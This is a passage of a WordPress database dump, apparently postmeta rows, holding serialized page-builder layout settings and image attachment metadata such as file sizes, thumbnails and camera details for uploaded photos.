h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:38:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:217;i:31;i:218;i:32;i:220;i:33;i:221;i:34;i:222;i:35;i:223;i:36;i:224;i:37;i:225;}}}'),(1705,1318,'is_colibri-wp_front_page','1'),(1706,1318,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:228;i:1;i:271;i:2;i:335;i:3;i:336;i:4;i:337;i:5;i:331;i:6;i:333;i:7;i:334;i:8;i:272;i:9;i:273;i:10;i:274;i:11;i:275;i:12;i:276;i:13;i:273;i:14;i:274;i:15;i:275;i:16;i:276;i:17;i:273;i:18;i:274;i:19;i:275;i:20;i:276;}}}'),(1707,1320,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:39:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:677;i:29;i:678;i:30;i:679;i:31;i:217;i:32;i:218;i:33;i:220;i:34;i:221;i:35;i:222;i:36;i:223;i:37;i:224;i:38;i:225;}}}'),(1712,1325,'extend_builder','a:2:{s:4:\"json\";i:353;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:21:{i:0;i:280;i:1;i:285;i:2;i:286;i:3;i:287;i:4;i:288;i:5;i:289;i:6;i:290;i:7;i:291;i:8;i:314;i:9;i:321;i:10;i:322;i:11;i:324;i:12;i:317;i:13;i:318;i:14;i:319;i:15;i:292;i:16;i:293;i:17;i:294;i:18;i:295;i:19;i:296;i:20;i:298;}}}'),(1729,1335,'_wp_attached_file','2022/06/IMG_1240-scaled.jpg'),(1730,1335,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1920;s:6:\"height\";i:2560;s:4:\"file\";s:27:\"2022/06/IMG_1240-scaled.jpg\";s:8:\"filesize\";i:737755;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG_1240-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17470;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG_1240-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149050;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_1240-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7072;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"IMG_1240-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149050;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"IMG_1240-1152x1536.jpg\";s:5:\"width\";i:1152;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:304180;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:22:\"IMG_1240-1536x2048.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:502879;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1654851670\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"IMG_1240.jpg\";}'),(1731,1336,'_wp_attached_file','2022/06/cropped-IMG_1240-scaled-1-e1697205792255.jpg'),(1732,1336,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1910;s:6:\"height\";i:1910;s:4:\"file\";s:52:\"2022/06/cropped-IMG_1240-scaled-1-e1697205792255.jpg\";s:8:\"filesize\";i:544065;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"cropped-IMG_1240-scaled-1-e1697205792255-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20822;}s:5:\"large\";a:5:{s:4:\"file\";s:54:\"cropped-IMG_1240-scaled-1-e1697205792255-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:178908;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"cropped-IMG_1240-scaled-1-e1697205792255-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6756;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"cropped-IMG_1240-scaled-1-e1697205792255-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108232;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:54:\"cropped-IMG_1240-scaled-1-e1697205792255-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:356232;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1654851670\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1733,1336,'_oembed_31f3137daa2d9eb3f0f9388b27d3858a','{{unknown}}'),(1746,1348,'_wp_attached_file','2022/08/hu_new-1.jpg'),(1747,1348,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:20:\"2022/08/hu_new-1.jpg\";s:8:\"filesize\";i:14601;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"hu_new-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15691;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"hu_new-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4666;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1754,1357,'_wp_attached_file','2022/03/cropped-Ruby-1.jpg'),(1755,1357,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2348;s:6:\"height\";i:2348;s:4:\"file\";s:26:\"2022/03/cropped-Ruby-1.jpg\";s:8:\"filesize\";i:813966;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"cropped-Ruby-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23030;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"cropped-Ruby-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212184;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"cropped-Ruby-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6632;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"cropped-Ruby-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128062;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"cropped-Ruby-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:418995;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:28:\"cropped-Ruby-1-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:667653;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1756,1357,'_oembed_0d1092d273662f7dbccbaa492ee23d9f','{{unknown}}'),(1757,1358,'_wp_attached_file','2022/03/cropped-cropped-ruby_parcells-scaled-1.jpg'),(1758,1358,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1920;s:4:\"file\";s:50:\"2022/03/cropped-cropped-ruby_parcells-scaled-1.jpg\";s:8:\"filesize\";i:447524;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"cropped-cropped-ruby_parcells-scaled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12911;}s:5:\"large\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113041;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"cropped-cropped-ruby_parcells-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5901;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"cropped-cropped-ruby_parcells-scaled-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62249;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:264999;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1759,1358,'_oembed_55bd757842f447f6296ab9cafb9673fd','{{unknown}}'),(1760,1359,'_wp_attached_file','2022/03/cropped-cropped-ruby_parcells-scaled-1-1.jpg'),(1761,1359,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1920;s:4:\"file\";s:52:\"2022/03/cropped-cropped-ruby_parcells-scaled-1-1.jpg\";s:8:\"filesize\";i:447524;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12911;}s:5:\"large\";a:5:{s:4:\"file\";s:54:\"cropped-cropped-ruby_parcells-scaled-1-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113041;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5901;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-ruby_parcells-scaled-1-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62249;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:54:\"cropped-cropped-ruby_parcells-scaled-1-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:264999;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1762,1359,'_oembed_55bd757842f447f6296ab9cafb9673fd','{{unknown}}'),(1771,1369,'_wp_attached_file','2022/11/bayo-e1695781168350.jpeg'),(1772,1369,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:810;s:6:\"height\";i:810;s:4:\"file\";s:32:\"2022/11/bayo-e1695781168350.jpeg\";s:8:\"filesize\";i:78741;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"bayo-e1695781168350-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16336;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"bayo-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107494;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"bayo-e1695781168350-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5215;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:32:\"bayo-e1695781168350-768x768.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84437;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1786,182,'_edit_last','1'),(1788,1388,'extend_builder','a:2:{s:4:\"json\";i:562;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:229:{i:0;i:407;i:1;i:510;i:2;i:511;i:3;i:512;i:4;i:513;i:5;i:514;i:6;i:515;i:7;i:516;i:8;i:517;i:9;i:518;i:10;i:512;i:11;i:513;i:12;i:514;i:13;i:515;i:14;i:516;i:15;i:517;i:16;i:520;i:17;i:512;i:18;i:513;i:19;i:514;i:20;i:515;i:21;i:516;i:22;i:517;i:23;i:518;i:24;i:512;i:25;i:513;i:26;i:514;i:27;i:515;i:28;i:516;i:29;i:517;i:30;i:519;i:31;i:512;i:32;i:513;i:33;i:514;i:34;i:515;i:35;i:516;i:36;i:517;i:37;i:521;i:38;i:512;i:39;i:513;i:40;i:514;i:41;i:515;i:42;i:516;i:43;i:517;i:44;i:518;i:45;i:512;i:46;i:513;i:47;i:514;i:48;i:515;i:49;i:516;i:50;i:517;i:51;i:518;i:52;i:512;i:53;i:513;i:54;i:514;i:55;i:515;i:56;i:516;i:57;i:517;i:58;i:518;i:59;i:512;i:60;i:513;i:61;i:514;i:62;i:515;i:63;i:516;i:64;i:517;i:65;i:518;i:66;i:522;i:67;i:523;i:68;i:524;i:69;i:605;i:70;i:606;i:71;i:607;i:72;i:608;i:73;i:609;i:74;i:610;i:75;i:611;i:76;i:612;i:77;i:613;i:78;i:607;i:79;i:608;i:80;i:609;i:81;i:610;i:82;i:611;i:83;i:612;i:84;i:614;i:85;i:607;i:86;i:608;i:87;i:609;i:88;i:610;i:89;i:611;i:90;i:612;i:91;i:615;i:92;i:607;i:93;i:608;i:94;i:609;i:95;i:610;i:96;i:611;i:97;i:612;i:98;i:616;i:99;i:607;i:100;i:608;i:101;i:609;i:102;i:610;i:103;i:611;i:104;i:612;i:105;i:613;i:106;i:607;i:107;i:608;i:108;i:609;i:109;i:610;i:110;i:611;i:111;i:612;i:112;i:613;i:113;i:607;i:114;i:608;i:115;i:609;i:116;i:610;i:117;i:611;i:118;i:612;i:119;i:613;i:120;i:607;i:121;i:608;i:122;i:609;i:123;i:610;i:124;i:611;i:125;i:612;i:126;i:613;i:127;i:607;i:128;i:608;i:129;i:609;i:130;i:610;i:131;i:611;i:132;i:612;i:133;i:613;i:134;i:607;i:135;i:608;i:136;i:609;i:137;i:610;i:138;i:611;i:139;i:612;i:140;i:613;i:141;i:607;i:142;i:608;i:143;i:609;i:144;i:610;i:145;i:611;i:146;i:612;i:147;i:613;i:148;i:607;i:149;i:608;i:150;i:609;i:151;i:610;i:152;i:611;i:153;i:612;i:154;i:613;i:155;i:607;i:156;i:608;i:157;i:609;i:158;i:610;i:159;i:611;i:160;i:612;i:161;i:607;i:162;i:608;i:163;i:609;i:164;i:610;i:165;i:611;i:166;i:612;i:167;i:613;i:168;i:701;i:169;i:702;i:170;i:707;i:171;i:704;i:172;i:710;i:173;i:709;i:174;i:703;i:175;i:617;i:176;i:618;i:177;i:619;i:178;i:626;i:179;i:627;i:180;i:628;i:181;i:629;i:182;i:630;i:183;i:631;i:184;i:632;i:185;i:633;i:186;i:634;i:187;i:628;i:188;i:629;i:189;i:630;i:190;i:631;i:191;i:632;i:192;i:633;i:193;i:635;i:194;i:628;i:195;i:629;i:196;i:630;i:197;i:631;i:198;i:632;i:199;i:633;i:200;i:636;i:201;i:628;i:202;i:629;i:203;i:630;i:204;i:631;i:205;i:632;i:206;i:633;i:207;i:637;i:208;i:628;i:209;i:629;i:210;i:630;i:211;i:631;i:212;i:632;i:213;i:633;i:214;i:634;i:215;i:638;i:216;i:639;i:217;i:640;i:218;i:680;i:219;i:681;i:220;i:683;i:221;i:684;i:222;i:694;i:223;i:695;i:224;i:700;i:225;i:699;i:226;i:696;i:227;i:697;i:228;i:698;}}}'),(1792,1391,'_wp_attached_file','2023/09/cropped-patterson.jpg'),(1793,1391,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:29:\"2023/09/cropped-patterson.jpg\";s:8:\"filesize\";i:15371;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"cropped-patterson-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15371;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"cropped-patterson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4732;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1794,1391,'_oembed_f9e10b252ff261d20f35d96b1e6edb19','{{unknown}}'),(1801,1394,'_wp_attached_file','2023/09/Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png'),(1802,1394,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:63:\"2023/09/Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\";s:8:\"filesize\";i:468023;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:63:\"Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207175304-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:131434;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207175304-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37867;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1806,1369,'_edit_lock','1695781040:1'),(1807,1369,'_wp_attachment_backup_sizes','a:9:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:810;s:6:\"height\";i:1080;s:4:\"file\";s:9:\"bayo.jpeg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:17:\"bayo-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5101;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:17:\"bayo-225x300.jpeg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12339;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:18:\"bayo-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107494;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:18:\"bayo-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107494;}s:18:\"full-1695781168350\";a:3:{s:5:\"width\";i:810;s:6:\"height\";i:810;s:4:\"file\";s:24:\"bayo-e1695778821230.jpeg\";}s:23:\"thumbnail-1695781168350\";a:5:{s:4:\"file\";s:32:\"bayo-e1695778821230-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5222;}s:20:\"medium-1695781168350\";a:5:{s:4:\"file\";s:32:\"bayo-e1695778821230-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16335;}s:26:\"medium_large-1695781168350\";a:5:{s:4:\"file\";s:32:\"bayo-e1695778821230-768x768.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83924;}}'),(1814,1369,'_edit_last','1'),(1818,1399,'_wp_attached_file','2023/09/sara-edwards1.jpg'),(1819,1399,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:25:\"2023/09/sara-edwards1.jpg\";s:8:\"filesize\";i:963488;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"sara-edwards1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15497;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"sara-edwards1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102253;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"sara-edwards1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8104;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"sara-edwards1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61091;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS M50m2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1662479582\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1828,1408,'_wp_attached_file','2023/09/Portrait-1.jpeg'),(1829,1408,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:23:\"2023/09/Portrait-1.jpeg\";s:8:\"filesize\";i:67381;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Portrait-1-300x200.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11235;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Portrait-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5444;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\"